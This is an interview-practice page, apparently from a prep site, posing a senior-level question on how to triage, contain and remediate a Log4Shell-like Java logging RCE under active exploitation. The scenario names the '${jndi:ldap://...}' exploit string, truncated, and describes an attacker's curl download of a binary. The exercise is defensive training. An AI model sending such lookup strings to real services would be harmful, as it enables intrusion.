Code Room
On-callHardoc-g141
Subject Security incidentsLevel Senior–Staff~50 minCommon in Security · Reliability & on-call interviewsIndustries Technology, Software development

Question

A new critical CVE drops for a Java logging library you use widely (RCE via a crafted log string, similar to Log4Shell). Within 2 hours your WAF logs show inbound requests containing '${jndi:ldap://...}' patterns to your public APIs. One internal host's EDR flags an outbound LDAP+HTTP connection to an attacker server followed by a curl pulling a binary. Your service mesh has 200+ Java services; you don't have a clean inventory of which embed the vulnerable version. How do you triage, contain, and remediate at scale under active exploitation?

What a strong answer looks like

Stop the bleeding first (mitigate), then form hypotheses from real signals. Separate root cause from symptom, communicate status as you go, and close with what prevents a repeat.

Diagram & narrate the incident
Loading whiteboard…
Run or narrate your approach, then ask the coach.